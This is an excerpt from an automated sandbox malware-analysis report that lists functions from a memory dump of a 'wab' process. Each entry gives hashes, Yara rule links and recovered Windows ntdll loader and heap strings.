                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: b843075884d40419ecc3d9a812642b1cec63978b1e82b65e186666f07ad2f9f3
                                          • Instruction ID: 90416d3f73309e7b531dddaf2f2a4660e2257ca6073c663abcc27ce2b928e6ad
                                          • Opcode Fuzzy Hash: b843075884d40419ecc3d9a812642b1cec63978b1e82b65e186666f07ad2f9f3
                                          • Instruction Fuzzy Hash: 1C818DB1609340AFE311CB15C884F6ABBE8EF94754F00496DBDA09B3B0E7B4D944CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$@
                                          • API String ID: 0-1537733988
                                          • Opcode ID: 84a68c0377892a9f390110e3a15cfb46d50a61818864f3702ee5f6598501b54f
                                          • Instruction ID: 4a699c1ed0aba1cb173ca438eb4ce11cac5cd0d9e876367bcbfce4cf43128c14
                                          • Opcode Fuzzy Hash: 84a68c0377892a9f390110e3a15cfb46d50a61818864f3702ee5f6598501b54f
                                          • Instruction Fuzzy Hash: 1071AC706193029FD704CF64C980B1BBBE5BF99718F118A2DE5EA87292C731D90DCB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2479B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2479B82A
                                          • GlobalizationUserSettings, xrefs: 2479B834
                                          • TargetNtPath, xrefs: 2479B82F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: e5d0bfd67f68551f47f0f8cd6f69de0ca3a676c7818b9654bedc5836918fdf7c
                                          • Instruction ID: 256f6e742d40135fe1f12885b92862af2acde23687e224004151b3865a6ab3ce
                                          • Opcode Fuzzy Hash: e5d0bfd67f68551f47f0f8cd6f69de0ca3a676c7818b9654bedc5836918fdf7c
                                          • Instruction Fuzzy Hash: 88616A72911228EFDB21DF54DC88BDABBF8BB14720F0101E9A518AB351DB749E84CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246BF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 2471E6A6
                                          • HEAP: , xrefs: 2471E6B3
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2471E6C6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 39d6bb4ffac4b5af60c5ae40838cfdc59ec66a9c83cc3fe9b8569cb4a8e62730
                                          • Instruction ID: 6566561f16129a4ca46701f7c1ffe0015f9222c9d50fa0b995daf76f7e08b608
                                          • Opcode Fuzzy Hash: 39d6bb4ffac4b5af60c5ae40838cfdc59ec66a9c83cc3fe9b8569cb4a8e62730
                                          • Instruction Fuzzy Hash: 8E51A031700644EFE716CBA4C994F9ABBF8EF15700F0440A5E5D6EB692D7B4EA40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246E15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 2472A590
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 2472A589
                                          • minkernel\ntdll\ldrmap.c, xrefs: 2472A59A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 679ef7111cfa5a6bfa12cd5b54a7e6c5a5da7589949da6f1e1d6d18908399de7
                                          • Instruction ID: d4e9399e3741ba54a052ddbbc2b50689d84a8943d7dfa3927c0f36e2d1ebb27e
                                          • Opcode Fuzzy Hash: 679ef7111cfa5a6bfa12cd5b54a7e6c5a5da7589949da6f1e1d6d18908399de7
                                          • Instruction Fuzzy Hash: 57512070701B85DBE716CB29C980FAA7BE4EF10714F1806A5EA65AB3E2C774ED40DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                          Download Yara Rule
                                          Strings
                                          • Failed to reallocate the system dirs string !, xrefs: 247382D7
                                          • minkernel\ntdll\ldrinit.c, xrefs: 247382E8
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 247382DE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 07f4fbd9b0f3e95594a1dc7d38ffa5c3c8bca0a65a38eb06dc72e3b9ffdbcf24
                                          • Instruction ID: 5b1c6033004b8739e5a78f32b9dfd398af43c736265a662e5bea97a1c2117e4a
                                          • Opcode Fuzzy Hash: 07f4fbd9b0f3e95594a1dc7d38ffa5c3c8bca0a65a38eb06dc72e3b9ffdbcf24
                                          • Instruction Fuzzy Hash: 264110B2505700ABD315DB24CC84F8B7BE8FF55B50F02092AFAA9E7391E734D8008B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246B758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                          • API String ID: 0-1151232445
                                          • Opcode ID: 418cea602b603ada023e80cdf5e0f634b3decbc5f2ffe4f52e0860a096eebfe4
                                          • Instruction ID: 4fd819b346705a7c372ad124e85c26ea10fa7b8bf13998b80ad7d4f76f9fabd7
                                          • Opcode Fuzzy Hash: 418cea602b603ada023e80cdf5e0f634b3decbc5f2ffe4f52e0860a096eebfe4
                                          • Instruction Fuzzy Hash: 0F414970300A808FEB16DF1DC0D1BA97BE49F11344F1444A9DAD9AB747E774D985CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpAllocateTls, xrefs: 24731B40
                                          • minkernel\ntdll\ldrtls.c, xrefs: 24731B4A
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 24731B39
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: f886b7e09e15e719ab65b92f0abb8bc317c7226faf85c0ef561a47be6dfa18aa
                                          • Instruction ID: 82951e9d3537f109a24093a2607fe94c7cea43fcb99336e4575f7103b799c2e2
                                          • Opcode Fuzzy Hash: f886b7e09e15e719ab65b92f0abb8bc317c7226faf85c0ef561a47be6dfa18aa
                                          • Instruction Fuzzy Hash: B3416975A00A04AFDB16CFA9CC81AAEBBF5FF58304F158119E419A7304E774A840CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2477C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 2477C1F1
                                          • PreferredUILanguages, xrefs: 2477C212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2477C1C5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: b8b68fb3c494964a0e6cf5842e7d3e50c741378ed07160496cd6883f339611c9
                                          • Instruction ID: 7f601f3ae24a41880f1c076c13a3fa6f303fd23e90ee21368d8d9f5de83b6e08
                                          • Opcode Fuzzy Hash: b8b68fb3c494964a0e6cf5842e7d3e50c741378ed07160496cd6883f339611c9
                                          • Instruction Fuzzy Hash: 3A415E72A00219EFEF01DFD4C994FEEBBB8AB19704F50406AE625F7344E7749A448B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24744755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 24744888
                                          • LdrpCheckRedirection, xrefs: 2474488F
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 24744899
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: ee017c8e31c3123415d9311176d2336d18ba7ece4e82a0c6daf81f058fb761bd
                                          • Instruction ID: b2c3b8574338fcfe74e16aa6d5d2270471e870df16d59bad4097c38eab4e980a
                                          • Opcode Fuzzy Hash: ee017c8e31c3123415d9311176d2336d18ba7ece4e82a0c6daf81f058fb761bd
                                          • Instruction Fuzzy Hash: 7B419D72E046509FCB12CE69C840E667BFDEB49B60F0105B9ED78A7316E730D901EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24754144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: 2f11d49f09dd03d1569fabdbc792e0c208df386c6c5494330ca9cd8ff98671cd
                                          • Instruction ID: 996c77357e48ef1fcf7b9893b2e37ee7481523bf4ad749f146ef18ff1be33a18
                                          • Opcode Fuzzy Hash: 2f11d49f09dd03d1569fabdbc792e0c208df386c6c5494330ca9cd8ff98671cd
                                          • Instruction Fuzzy Hash: 7A413472A00668CBEB22CBA6D944BACBBF4EF55340F14006ADD21FF3A5D7748941CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2474B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                          Download Yara Rule
                                          Strings
                                          • GlobalFlag, xrefs: 2474B68F
                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 2474B632
                                          • @, xrefs: 2474B670
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                          • API String ID: 0-4192008846
                                          • Opcode ID: 311cb3959e410b48e4008b0cbef44b0dd9a426303acfc0a7076ffa19440323e6
                                          • Instruction ID: da0fbe8a31c408b8579d4463b1bd2f1b854e7125c8985f2d12e64da8c5dc692e
                                          • Opcode Fuzzy Hash: 311cb3959e410b48e4008b0cbef44b0dd9a426303acfc0a7076ffa19440323e6
                                          • Instruction Fuzzy Hash: 64316CB5D00219AFEB10EFA4CC84AEEBBB8EF54744F1044A9E615A7240D7749E40CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F1607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 24731A51
                                          • DLL "%wZ" has TLS information at %p, xrefs: 24731A40
                                          • LdrpInitializeTls, xrefs: 24731A47
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: 96fc3bb3a3421d144732bdf6142a0598beae1a5f4761b8cd4400956d534ecd8a
                                          • Instruction ID: c36203976e0a462b759643d855d53216d8533c2a079fe7cdca599f7abe56daff
                                          • Opcode Fuzzy Hash: 96fc3bb3a3421d144732bdf6142a0598beae1a5f4761b8cd4400956d534ecd8a
                                          • Instruction Fuzzy Hash: 73310531B00205ABE7178B48CC89FEA77F9FB50398F060159F592BB280E774EE448794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                          Download Yara Rule
                                          Strings
                                          • Process initialization failed with status 0x%08lx, xrefs: 247420F3
                                          • minkernel\ntdll\ldrinit.c, xrefs: 24742104
                                          • LdrpInitializationFailure, xrefs: 247420FA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 48fb7d5e6a30d3b59282c33c67fb6785c767f5e5efbbccd738eec2b0561d0170
                                          • Instruction ID: f2d67ef37188c42ebe71ef0a59994b074d6854c63feac201f97f098bd560e513
                                          • Opcode Fuzzy Hash: 48fb7d5e6a30d3b59282c33c67fb6785c767f5e5efbbccd738eec2b0561d0170
                                          • Instruction Fuzzy Hash: F5F0FC31A402587FE714D748CC96FE93BBCEB54B94F500055FA147B385D2F0AD50CA51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2473E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 2bf4c86dd84e7b5810d21da58354359b1add5f72fdea47a854b4e51a3ee8589d
                                          • Instruction ID: 3a0023137c53edc58151e2d5a44315f73d47b6065c18aaa0bad4abb3c5fa378e
                                          • Opcode Fuzzy Hash: 2bf4c86dd84e7b5810d21da58354359b1add5f72fdea47a854b4e51a3ee8589d
                                          • Instruction Fuzzy Hash: 28615E72E006189FDB15CFA9C890BAEBBF9FB48704F504469E669EB352D731A940CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246DF720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$
                                          • API String ID: 0-233714265
                                          • Opcode ID: 24bdcaa5e0511d58dfe4afeaeb98d8fe256150215ccd2909a091b75b9e8f4896
                                          • Instruction ID: a01641b43715abbbb70ad30580e5d7a3fa81827239ec3fae1fa4d734c0f42fd1
                                          • Opcode Fuzzy Hash: 24bdcaa5e0511d58dfe4afeaeb98d8fe256150215ccd2909a091b75b9e8f4896
                                          • Instruction Fuzzy Hash: DD61BD72E00649DFEB29CFA4C584FADBBF1FF54308F004469D51A6B684CB74A941CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 246C063D
                                          • kLsE, xrefs: 246C0540
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: f19432a2dafb7f5ad0801736884880fec0acebbf99d346d64af215c2e9fb88fa
                                          • Instruction ID: bb22ec9802ae23b6fec8ea0e4f0d6592b4425d66e91d199e58c5cb6eba1014ce
                                          • Opcode Fuzzy Hash: f19432a2dafb7f5ad0801736884880fec0acebbf99d346d64af215c2e9fb88fa
                                          • Instruction Fuzzy Hash: 2051DF716047428FD324DFB5C548693BBE8EF95304F00883EEAAA97241E774DA45CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247535BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: 6bae0ba9df7db0af0473aa82b62687a8eb2a8680130bed3ac94e534e0818944e
                                          • Instruction ID: bc06621eb99db8930a02b61b1476e1c9adc7cee433ec1f0af0212d1fecc94f5a
                                          • Opcode Fuzzy Hash: 6bae0ba9df7db0af0473aa82b62687a8eb2a8680130bed3ac94e534e0818944e
                                          • Instruction Fuzzy Hash: 2631C1322097419BE311CF25D484B1AB7E4EF95750F04086DFD64CB3A0EBB0D905CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 24732A95
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 24732A90
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 7fd2b2c3be06bd34ded01f2ee0dce5141028c30f44a05e37f2ad63e6649b2ffa
                                          • Instruction ID: e8fa157d081d118f85e5b04dc937566e7d8a051542b1a04bfec48f20dc4e2d71
                                          • Opcode Fuzzy Hash: 7fd2b2c3be06bd34ded01f2ee0dce5141028c30f44a05e37f2ad63e6649b2ffa
                                          • Instruction Fuzzy Hash: D3114C72B00314FBE7258A98CD45F5B7EADDBA4B54F1980697E04EF345D6B4CD4086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
